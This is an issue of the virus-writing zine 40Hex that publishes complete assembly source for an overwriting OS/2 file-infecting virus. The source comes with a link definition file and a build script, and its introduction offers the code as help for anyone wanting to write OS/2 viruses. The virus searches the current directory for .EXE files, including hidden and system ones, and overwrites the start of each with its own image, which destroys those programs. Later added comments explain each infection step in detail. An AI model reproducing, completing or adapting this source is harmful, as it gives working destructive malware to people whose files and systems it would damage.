
  1. 40Hex Number 12 Volume 3 Issue 3                                      File 009
  2.  
  3.     This virus was given to us by Arthur Ellis, and is the first piece
  4. of OS/2 virus source that I have ever seen.  Although it is only an
  5. overwriting virus, it should definitely be helpful for anyone who wants
  6. to write viruses in OS/2.
  7.  
  8.                                                 ->GHeap
  9.  
  10. -----------------------------<Os2Vir1.Asm>-------------------------------------
  11. INCLUDE OS2.INC     ; if you don't have OS2.INC, see end of this file
  12. COMMENT *
  13. This simple overwriting virus demonstrates how the OS/2 API functions
  14. are used to search for, open, and infect programs. No extended registers
  15. are used, and the program may be assembled with MASM 5.1 or 6.0, TASM
  16. for OS/2 (from the Borland C++ package), or with IBM Macro Assembler/2.
  17. Link with: link386 /exepack virus,,,c:\os2\doscalls,virus.def
  18. VIRUS.DEF:         NAME VIRUS WINDOWCOMPAT
  19.                    PROTMODE
  20.                    STACKSIZE 8192
  21. There is minimal error checking (since when do viruses check errors?). A
  22. useful project for a student would be to convert this program to .386p mode.
  23. - Arthur Ellis, 1993
  24. *
  25. PrintIt     MACRO   string, StrLen
            ;-----------------------------------------------------------
            ; PrintIt string, StrLen
            ;   DosWrite(1, DS:string, StrLen, DS:Written)
            ;   StrLen may be an immediate or a byte variable: it is
            ;   loaded through CL after zeroing CX, so at most 255 bytes
            ;   can be written per call. Clobbers CX, DX and flags.
            ;   DosWrite's return code (AX) is not checked by any caller
            ;   in this file.
            ;-----------------------------------------------------------
  26.             push    1                       ; stdout handle
  27.             push    DS                      ; SEGMENT of string
  28.             mov     DX, OFFSET string       ; string to write
  29.             push    DX                      ; OFFSET of string
  30.             xor     CX,CX                   ; CX = 0 so CL alone carries the length
  31.             mov     CL, [StrLen]            ; string length (byte)
  32.             push    CX
  33.             push    DS                      ; SEGMENT of bytes-written variable
  34.             push    OFFSET Written          ; bytes written variable
  35.             call    DosWrite                ; like int 21/40
  36.             ENDM
  37. OpenIt      MACRO   seg, handle, mode       ; seg:BX = file name, handle = result var, mode = open mode
            ;-----------------------------------------------------------
            ; OpenIt seg, handle, mode
            ;   DosOpen(seg:BX name, DS:handle, DS:OpenAction, size 0L,
            ;           attr 3, FILE_OPEN, mode, reserved 0L)
            ;   Expects BX = OFFSET of the ASCIIZ file name in segment
            ;   'seg'. FILE_OPEN means only existing files are opened,
            ;   nothing is created. Afterwards AX = OS/2 return code
            ;   (0 = success); main tests it after the victim open, the
            ;   self-open result is not tested.
            ;-----------------------------------------------------------
  38.             push    seg                     ; SEGMENT of file name
  39.             push    BX                      ; OFFSET of file name
  40.             push    DS                      ; SEGMENT of handle
  41.             push    OFFSET handle           ; OFFSET of handle
  42.             push    DS                      ; SEGMENT of open action
  43.             push    OFFSET OpenAction       ; OFFSET of open action
  44.             push    0                       ; file size DWORD (high word)
  45.             push    0                       ; file size DWORD (low word)
  46.             push    3                       ; attributes: hid,r-o,norm
  47.             push    1                       ; FILE_OPEN
  48.             push    mode                    ; open mode (access + share bits)
  49.             push    0                       ; DWORD 0 (reserved)
  50.             push    0                       ; DWORD 0 (reserved)
  51.             Call    DosOpen                 ; like int 21/3D
  52.             ENDM
  53. .286p
  54.  
  55. STACK       SEGMENT PARA STACK 'STACK'
  56.             DW    1000h                     ; a single word; the declared stack is presumably STACKSIZE 8192 from VIRUS.DEF (end of file)
  57. STACK       ENDS
  58.  
  59. DGROUP      GROUP   _DATA, STACK            ; _DATA and STACK share one group, so DS == SS (FindIt pushes SS as DirHandle's segment)
  60.  
  61.             ASSUME  CS:_TEXT, DS:DGROUP, SS:DGROUP, ES:DGROUP
  62.  
  63. _DATA       SEGMENT WORD PUBLIC 'DATA'
  64.  
            ; Message strings. They are contiguous on purpose: the PrintIt
            ; lengths used in the code run from one string into the next
            ; (Infected is printed with length 15, i.e. its 13 bytes plus
            ; the CR/LF that starts CRLF). The ANSI sequences (ESC[2J clear
            ; screen, ESC[1;36m bright cyan, ESC[m reset) and the
            ; "My name is" / "--> infected" text are this sample's visible
            ; on-screen indicators.
  65. FileSpec    DB      '*.EXE', 0              ; search mask; no path, so the current directory only
  66. OpenErr     DB      ' <Error opening file>',13,10,27,'[m'
  67. Hello       DB      27,'[2J',27,'[1;36mMy name is '
  68. Infected    DB      ' --> infected'
  69. CRLF        DB      13,10,27,'[m'
  70. Written     DW      ?                       ; bytes written (filled by every DosWrite, never read back)
  71. MyHandle    DW      ?                       ; handle of this program's own file
  72. VicHandle   DW      ?                       ; handle of the file currently being overwritten
  73. OpenAction  DW      ?                       ; open result (action taken by DosOpen)
  74. Buf         FileFindBuf <>                  ; file find structure (FILEFINDBUF, see the OS2.INC excerpt at the end of the file)
  75. MySize      DW      ?                       ; length of this program's own path name (set by GetName)
  76. EnvSeg      DW      ?                       ; selector for environment
  77. CmdOfs      DW      ?                       ; OFFSET of command line (filled by DosGetEnv, not otherwise used)
  78. Image       DB      2000 dup (?)            ; copy of this program's file; main reads at most 2000 bytes
  79. ImageLen    DW      ?                       ; bytes actually read into Image
  80. DirHandle   DW      -1                      ; directory handle; -1 = HDIR_CREATE, DosFindFirst allocates one
  81. SrchCount   DW      1                       ; entries requested per Find call; the API overwrites it with the number returned
  82. _DATA       ENDS
  83.  
  84. _TEXT       SEGMENT WORD PUBLIC 'CODE'
            ; 16-bit OS/2 API entry points, resolved from the doscalls
            ; library named in the link line above. DOSFINDCLOSE is
            ; declared but not called anywhere in this file.
  85.             extrn DOSCLOSE:far, DOSEXIT:far, DOSWRITE:far, DOSGETENV:far
  86.             extrn DOSFINDCLOSE:far, DOSFINDFIRST:far, DOSFINDNEXT:far
  87.             extrn DOSOPEN:far, DOSREAD:far
  88.  
  89. main        PROC    far
            ;-----------------------------------------------------------
            ; Entry point (far PROC, END start below). What it does:
            ;   1. GetName: locate this program's own path in the
            ;      environment segment and print the banner.
            ;   2. Open that file and DosRead at most 2000 bytes of it
            ;      into Image (ImageLen = bytes read).
            ;   3. FindIt: DosFindFirst "*.EXE" in the current directory.
            ;      For every match: open it read/write and DosWrite the
            ;      Image at the current position - offset 0 for a fresh
            ;      handle, no seek is done - so the victim's own header
            ;      is destroyed rather than preserved (overwriting, not
            ;      appending). The mask also matches this program's own
            ;      file.
            ;   4. DosFindNext until it returns an error, then DosExit.
            ; Only the victim DosOpen and the Find calls have their
            ; return code (AX) checked; DosRead, DosWrite and DosClose
            ; are not checked.
            ;-----------------------------------------------------------
  90. start:      call    GetName                 ; ES:BX -> own path name, MySize = its length
  91.             OpenIt  ES, MyHandle, 40h       ; open own file: read access, share deny-none (40h); result not checked
  92. ;--------------------------------------------------------------------
  93. ;---( Read virus to image buffer )-----------------------------------
  94. ;--------------------------------------------------------------------
  95.             push    MyHandle                ; handle for this program
  96.             push    DS                      ; buffer for file image
  97.             push    OFFSET Image
  98.             push    2000                    ; Could use DosQFileInfo to
  99.                                             ;  get filesize but this works
  100.             push    DS
  101.             push    OFFSET ImageLen         ; bytes actually read go here
  102.             call    DosRead                 ; like int 21/3F
  103. ;--------------------------------------------------------------------
  104. ;---( Find files to infect )-----------------------------------------
  105. ;--------------------------------------------------------------------
  106.             call    FindIt                  ; DosFindFirst; AX = return code
  107.  
  108. found:      or      AX, AX                  ; Find call failed (including no more files)?
  109.             jz      NoErr                   ; no error
  110.  
  111. quit:       push    1                       ; DosExit action: terminate all threads
  112.             push    0                       ; return code
  113.             call    DosExit                 ; like int 21/4C; open handles are never closed explicitly
  114.  
  115. NoErr:      cmp     word ptr SrchCount, 0   ; SrchCount now holds the number of entries returned
  116.             jz      quit                    ; none found
  117.  
  118.             PrintIt Buf.findbuf_achname,Buf.findbuf_cchName
  119.                                             ; display filename found (cchName = its byte length)
  120. ;--------------------------------------------------------------------
  121. ;---( Write virus )--------------------------------------------------
  122. ;--------------------------------------------------------------------
  123.             lea     BX,Buf.findbuf_achName  ; filename OFFSET in BX, as OpenIt expects
  124.  
  125.             OpenIt  DS, VicHandle, 42       ; ACCESS_READWRITE|SHAREDENYNONE
            ; NOTE(review): 42 above is decimal (2Ah), not 42h, so the
            ; flag names in that comment may not match the value pushed;
            ; the low bits do request read/write access. Confirm against
            ; OS2.INC.
  126.             or      AX,AX                   ; DosOpen return code
  127.             jz      proceed
  128.             PrintIt OpenErr, 25             ; error on open
  129.             jmp     CloseIt                 ; still runs DosClose on VicHandle after a failed open
  130.  
  131. proceed:    PrintIt Infected,15             ; ' --> infected' plus the CR/LF that follows it in CRLF
  132.             mov     BX,[VicHandle]
  133.             push    [VicHandle]             ; write to found file
  134.             push    DS
  135.             push    OFFSET Image            ; the copy of this program
  136.             push    [ImageLen]              ; bytes read earlier (<= 2000)
  137.             push    DS
  138.             push    OFFSET Written          ; bytes written variable
  139.             call    DosWrite                ; overwrite the victim from offset 0
  140.  
  141. CloseIt:    push    [VicHandle]             ; prepare to close
  142.             call    DosClose                ; close file
  143. ;--------------------------------------------------------------------
  144. ;---( Find next file )-----------------------------------------------
  145. ;--------------------------------------------------------------------
  146.             push    DirHandle               ; Directory Handle (filled in by DosFindFirst)
  147.             push    DS                      ; SEGMENT of buffer
  148.             push    OFFSET Buf              ; OFFSET of buffer
  149.             push    SIZE Buf                ; length of buffer
  150.             push    DS                      ; SEGMENT of count
  151.             push    OFFSET SrchCount        ; OFFSET of count (in: 1 wanted; out: entries returned)
  152.             call    DosFindNext             ; Find next file
  153.                                             ; like int 21/4F
  154.             jmp     found                   ; loop: infect if found else exit via quit
  155.  
  156. main        ENDP
  157. ;--------------------------------------------------------------------
  158. ;---( Get virus file name from environment )-------------------------
  159. ;--------------------------------------------------------------------
  160. GetName     PROC    near
            ;-----------------------------------------------------------
            ; Locate this program's own path name and announce it.
            ; Out:   ES:BX -> ASCIIZ path of the running program
            ;        MySize = length of that name (without the NUL)
            ; Clobb: AX, CX, DX, DI, flags
            ; The name is found by scanning the environment segment from
            ; offset 0 for the double NUL that ends the environment
            ; block; the string right after it is taken as the program
            ; path. CmdOfs is loaded into BX but BX is overwritten before
            ; it is used, so the command-line offset from DosGetEnv is
            ; not actually used.
            ;-----------------------------------------------------------
  161.             push    ds
  162.             push    OFFSET EnvSeg           ; receives environment selector
  163.             push    ds
  164.             push    OFFSET CmdOfs           ; receives command-line offset
  165.             call    DosGetEnv               ; get seg, ofs of command line
  166.  
  167.             mov     ES,EnvSeg               ; ES:BX holds command line
  168.             mov     BX,CmdOfs
  169.  
  170.             xor     DI,DI                   ; scan from the start of the environment segment
  171.             xor     AL,AL                   ; byte to look for: NUL
  172.             mov     CX,-1                   ; no length limit
  173.             cld
  174. scan:       repne   scasb                   ; skip to the next NUL
  175.             scasb                           ; is the byte after it NUL too?
  176.             jne     scan                    ; no: a single NUL just ended one env string
  177.             mov     BX,DI                   ; yes: DI is past the double NUL = program name address
  178.             mov     CX,-1                   ; find length
  179.             repne   scasb                   ; scan for null byte
  180.             not     CX                      ; CX = bytes scanned including the NUL ...
  181.             dec     CX                      ; ... minus the NUL = strlen
  182.             mov     [MySize],CX             ; return length
  183.  
  184.             PrintIt Hello, 22               ; ESC[2J ESC[1;36m "My name is " (22 bytes)
  185.  
  186.             push    1                       ; stdout handle
  187.             push    ES                      ; segment for command line
  188.             push    BX                      ; OFFSET of program name
  189.             push    [MySize]                ; length of program name
  190.             push    DS
  191.             push    OFFSET Written          ; bytes written variable
  192.             call    DosWrite                ; like int 21/40; written out by hand, presumably because the name lives in ES, not DS, so PrintIt does not fit
  193.  
  194.             PrintIt CRLF,5                  ; CR LF ESC[m
  195.             ret
  196. GetName     ENDP
  197. ;--------------------------------------------------------------------
  198. ;---( Find first victim )--------------------------------------------
  199. ;--------------------------------------------------------------------
  200. FindIt      PROC    near
            ;-----------------------------------------------------------
            ; DosFindFirst(DS:FileSpec, SS:DirHandle, 07h, DS:Buf,
            ;              SIZE Buf, DS:SrchCount, 0L)
            ; Out:   AX = return code (0 = a match is in Buf)
            ;        DirHandle = search handle for DosFindNext
            ;        SrchCount = number of entries returned (1 requested)
            ; Clobb: AX, flags
            ; Searches the current directory only (FileSpec has no path).
            ;-----------------------------------------------------------
  201.             push    DS
  202.             push    OFFSET FileSpec         ; "*.EXE"
  203.             push    SS                      ; SEGMENT of directory handle (SS == DS, both DGROUP)
  204.             lea     AX, DirHandle           ; OFFSET of directory handle (-1 = HDIR_CREATE on entry)
  205.             push    AX
  206.             push    07h                     ; attribute: also match read-only, hidden and system files
  207.             push    DS                      ; SEGMENT of buffer
  208.             push    OFFSET Buf              ; OFFSET of buffer
  209.             push    SIZE Buf                ; length of buffer
  210.             push    DS                      ; SEGMENT of search count
  211.             lea     AX, SrchCount           ; OFFSET of search count (1 on entry)
  212.             push    AX
  213.             push    0                       ; Reserved (DWORD)
  214.             push    0
  215.             call    DosFindFirst            ; Find first file
  216.             ret                             ; like int 21/4E
  217. FindIt      ENDP
  218. ;--------------------------------------------------------------------
  219. _TEXT       ENDS
  220.             END start
  221. ;--------------------------------------------------------------------
  222. ;--( FTIME structure from OS2.INC )----------------------------------
  223. ;--------------------------------------------------------------------
  224. ;FTIME   STRUC
  225. ;    ftime_fs    DW  ?
  226. ;FTIME   ENDS
  227. ;ftime_twosecs   EQU 01fh
  228. ;ftime_minutes   EQU 07e0h
  229. ;ftime_hours EQU 0f800h
  230. ;--------------------------------------------------------------------
  231. ;--( FDATE structure from OS2.INC )----------------------------------
  232. ;--------------------------------------------------------------------
  233. ;FDATE   STRUC
  234. ;    fdate_fs    DW  ?
  235. ;FDATE   ENDS
  236. ;fdate_day   EQU 01fh
  237. ;fdate_month EQU 01e0h
  238. ;fdate_year  EQU 0fe00h
  239. ;--------------------------------------------------------------------
  240. ;--( FileFindBuf structure from OS2.INC )----------------------------
  241. ;--------------------------------------------------------------------
  242. ;FILEFINDBUF STRUC
  243. ;findbuf_fdateCreation   DB  SIZE FDATE DUP (?)
  244. ;findbuf_ftimeCreation   DB  SIZE FTIME DUP (?)
  245. ;findbuf_fdateLastAccess DB  SIZE FDATE DUP (?)
  246. ;findbuf_ftimeLastAccess DB  SIZE FTIME DUP (?)
  247. ;findbuf_fdateLastWrite  DB  SIZE FDATE DUP (?)
  248. ;findbuf_ftimeLastWrite  DB  SIZE FTIME DUP (?)
  249. ;findbuf_cbFile  DD  ?
  250. ;findbuf_cbFileAlloc DD  ?
  251. ;findbuf_attrFile    DW  ?
  252. ;findbuf_cchName DB  ?
  253. ;findbuf_achName DB  256 DUP (?)
  254. ;FILEFINDBUF ENDS
  255. ;---------------------------------------------------------------------
  256.  
  257. -----------------------------<Virus.Def>----------------------------------------
  258. NAME VIRUS WINDOWCOMPAT
  259. PROTMODE
  260. STACKSIZE 8192
  261.  
  262. -----------------------------<DoIt.Cmd>-----------------------------------------
  263. masm /Zi %1;
  264. link386 /exepack %1,,,c:\os2\doscalls,virus.def
  265.  
  266.